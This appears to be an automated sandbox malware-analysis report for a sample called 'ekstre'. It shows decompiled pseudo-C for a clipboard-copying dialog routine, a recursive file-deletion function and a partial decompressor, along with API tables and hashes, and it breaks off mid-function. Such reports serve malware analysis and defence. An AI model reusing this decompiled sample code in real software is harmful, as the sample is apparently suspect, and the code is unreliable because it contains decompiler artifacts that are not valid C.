0x00405a02
0x00405a07
0x00405a0a
0x00000000
0x00405a0a
0x004059f1
0x0040582a
0x0040582e
0x00405836
0x0040583a
0x0040583d
0x00405840
0x00405843
0x00405846
0x00405847
0x00405848
0x00405861
0x00405864
0x0040586e
0x0040587d
0x00405885
0x0040588d
0x00405892
0x00405895
0x004058a1
0x004058aa
0x004058b3
0x004058d5
0x004058db
0x004058ec
0x004058f1
0x004058ff
0x0040590d
0x0040590d
0x00405912
0x00405920
0x00405920
0x00405925
0x00405928
0x0040592d
0x00405939
0x00405942
0x0040594f
0x0040595e
0x00405951
0x00405956
0x00405956
0x0040596a
0x0040596a
0x0040597e
0x00405987
0x00405990
0x004059a0
0x004059ac
0x004059ac
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405867
GetDlgItem.USER32(?,000003EE), ref: 00405876
GetClientRect.USER32(?,?), ref: 004058B3
GetSystemMetrics.USER32(00000002), ref: 004058BA
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
ShowWindow.USER32(?,00000008), ref: 00405956
GetDlgItem.USER32(?,000003EC), ref: 00405977
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
GetDlgItem.USER32(?,000003F8), ref: 00405885

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,?,00404424), ref: 00404607

GetDlgItem.USER32(?,000003EC), ref: 004059C9
CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
CloseHandle.KERNELBASE(00000000), ref: 004059DE
ShowWindow.USER32(00000000), ref: 00405A02
ShowWindow.USER32(?,00000008), ref: 00405A07
ShowWindow.USER32(00000008), ref: 00405A51
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
CreatePopupMenu.USER32 ref: 00405A96
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
GetWindowRect.USER32(?,?), ref: 00405ACA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
OpenClipboard.USER32(00000000), ref: 00405B2B
EmptyClipboard.USER32 ref: 00405B31
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
GlobalLock.KERNEL32(00000000), ref: 00405B47
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
CloseClipboard.USER32 ref: 00405B8C

Strings

{, xrefs: 00405A6F
HgD, xrefs: 00405AF7

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: HgD${
API String ID: 590372296-1241270049
Opcode ID: 2b2ed3d84cd1bd483c78ed4bddd29544de9adb64ad63d0f38b8574afdeb58bc7
Instruction ID: cb0ca38e27b9ce572f3f488e3f0d985218e3c43d95c603e01a751ae3887d216c
Opcode Fuzzy Hash: 2b2ed3d84cd1bd483c78ed4bddd29544de9adb64ad63d0f38b8574afdeb58bc7
Instruction Fuzzy Hash: 48B157B0800608FFDF119FA0DD89AAE7B79FB08354F00417AFA45BA1A0CB755E519F69

Uniqueness

Uniqueness Score: -1.00%

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x4702e8 =  *0x4702e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x456750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x456750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x456750,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x4702e8 =  *0x4702e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x456750 - 0x5c;
					if( *0x456750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x4702e8 =  *0x4702e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405d7e
0x00405d83
0x00405d8c
0x00405d8f
0x00405d97
0x00405d9a
0x00405d9d
0x00405da5
0x00405da7
0x00405da8
0x00000000
0x00405da8
0x00405db3
0x00405db6
0x00405db6
0x00405db6
0x00405dba
0x00405dcd
0x00405dd4
0x00405dd9
0x00405ddd
0x00405ded
0x00405ddf
0x00405de5
0x00405de5
0x00405df2
0x00405df6
0x00405e02
0x00405e08
0x00405e0d
0x00405e13
0x00405e1e
0x00405e24
0x00405e26
0x00405e29
0x00405ed3
0x00405ed3
0x00405ed7
0x00405ed9
0x00405ed9
0x00405ed9
0x00405ed9
0x00000000
0x00000000
0x00000000
0x00000000
0x00405e2f
0x00405e2f
0x00405e2f
0x00405e37
0x00405e57
0x00405e5f
0x00405e64
0x00405e6b
0x00405e86
0x00405e8b
0x00405e8d
0x00405eb1
0x00405e8f
0x00405e8f
0x00405e92
0x00405ea6
0x00405e94
0x00405e97
0x00405e9f
0x00405e9f
0x00405e92
0x00405e6d
0x00405e73
0x00405e75
0x00405e7b
0x00405e7b
0x00405e75
0x00000000
0x00405e6b
0x00405e39
0x00405e41
0x00000000
0x00000000
0x00405e43
0x00405e4b
0x00000000
0x00000000
0x00405e4d
0x00405e55
0x00000000
0x00000000
0x00000000
0x00405eb6
0x00405ebe
0x00405ec4
0x00405ec4
0x00405ecd
0x00000000
0x00405ecd
0x00405df8
0x00405e00
0x00000000
0x00000000
0x00000000
0x00405dbc
0x00405dbc
0x00405dbe
0x00405ede
0x00405ee0
0x00405ee3
0x00405f34
0x00405f34
0x00405f34
0x00405ee5
0x00405ee8
0x00405ef3
0x00405ef8
0x00405efa
0x00000000
0x00000000
0x00405efd
0x00405f09
0x00405f0e
0x00405f10
0x00000000
0x00405f2b
0x00405f12
0x00405f15
0x00000000
0x00000000
0x00405f1a
0x00000000
0x00405f21
0x00405eea
0x00405eea
0x00000000
0x00405eea
0x00405dc4
0x00405dc7
0x00000000
0x00000000
0x00000000
0x00405dc7

APIs

DeleteFileW.KERNELBASE(?,?,75D53420,75D52EE0,00000000), ref: 00405D9D
lstrcatW.KERNEL32(00456750,\*.*), ref: 00405DE5
lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
lstrlenW.KERNEL32(?,?,0040A014,?,00456750,?,?,75D53420,75D52EE0,00000000), ref: 00405E0E
FindFirstFileW.KERNEL32(00456750,?,?,?,0040A014,?,00456750,?,?,75D53420,75D52EE0,00000000), ref: 00405E1E
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
FindClose.KERNEL32(00000000), ref: 00405ECD

Strings

PgE, xrefs: 00405DCD
., xrefs: 00405E43
\*.*, xrefs: 00405DDF
., xrefs: 00405E2F

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$PgE$\*.*
API String ID: 2035342205-642249328
Opcode ID: dd67ed5d5ac29c63e428a08cfb2be6c4e2df7b3a5e6761a93e4ec1c8a6b4717d
Instruction ID: 98b2dc6bd422d61c56a8e42b80d5dd3d62c6de78452aeca085abdd1ceada4103
Opcode Fuzzy Hash: dd67ed5d5ac29c63e428a08cfb2be6c4e2df7b3a5e6761a93e4ec1c8a6b4717d
Instruction Fuzzy Hash: 0E41D230801A15AADB21AB61CC4DABF7678EF41719F10417FF885711D1DB7C4A82DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__ebx = __edx + 1;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											__ebx = __edx + 1;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
